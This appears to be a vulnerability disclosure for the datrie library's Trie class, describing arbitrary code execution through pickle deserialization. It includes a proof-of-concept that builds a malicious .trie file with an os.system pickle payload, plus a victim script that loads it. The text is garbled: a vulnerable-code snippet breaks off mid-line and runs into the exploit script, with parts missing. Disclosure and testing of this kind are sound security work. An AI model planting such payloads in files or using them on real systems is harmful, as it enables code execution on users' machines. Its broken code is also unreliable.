## Vulnerability Overview **Vulnerability Name**: Arbitrary Code Execution via Insecure Deserialization in datrie.Trie (#109) **Description**: The `datrie.Trie` class contains a vulnerability when deserializing internal data using `pickle.load()`. Attackers can craft malicious `.trie` files embedding malicious pickle payloads. When a user loads such a file, arbitrary Python code is executed. **Affected Methods**: `Trie.read()` and `Trie.__setstate__()`. ## Scope of Impact * **Affected Versions**: All versions through 0.8.3 * **CWE**: CWE-502 — Deserialization of Untrusted Data * **Severity**: Critical * **Impact**: Arbitrary Code Execution ## Vulnerable Code The following code snippets illustrate the three vulnerable entry points in `datrie.py`: 1. **Trie.__setstate__() (Line 678)** ```python def __setstate__(self, bytes_state): assert self._c_trie is None with tempfile.NamedTemporaryFile() as f: f.write(bytes_state) f.flush() f.seek(0) self._c_trie = _load_from_file(f) self._values = pickle.load(f) # /tmp/proof.txt" return (os.system, (cmd,)) evil_values = [Evil()] evil_pickle_data = pickle.dumps(evil_values) # Step D: Combine into one file: valid trie + evil pickle with open('/tmp/evil_dictionary.trie', 'wb') as f: f.write(trie_binary_data) f.write(evil_pickle_data) print("Malicious file created: /tmp/evil_dictionary.trie") print("This file looks like a normal trie dictionary file.") print("When someone loads it, it will secretly run a command.") ``` **2. Victim Script (victim_app.py)** This script simulates a normal user loading a trie file. ```python import datrie print("=== Normal Application ===") print("Loading dictionary file...") print() # This is what any normal user would do. # They received a trie file and want to use it. # They have no idea this will execute code. try: trie = datrie.Trie.load('/tmp/evil_dictionary.trie') print("Trie loaded. Keys:", list(trie.keys())) except Exception as e: print("Trie loading had an error:", e) print("BUT - check if the command already ran!") print() print("=== Checking if attacker's code executed ===") try: with open('/tmp/proof.txt', 'r') as f: content = f.read().strip() print("RESULT: VULNERABLE") print("The file /tmp/proof.txt now contains:", content) print("The attacker's code ran just by loading a .trie file!") except FileNotFoundError: print("RESULT: Not vulnerable (proof file was not created)") ```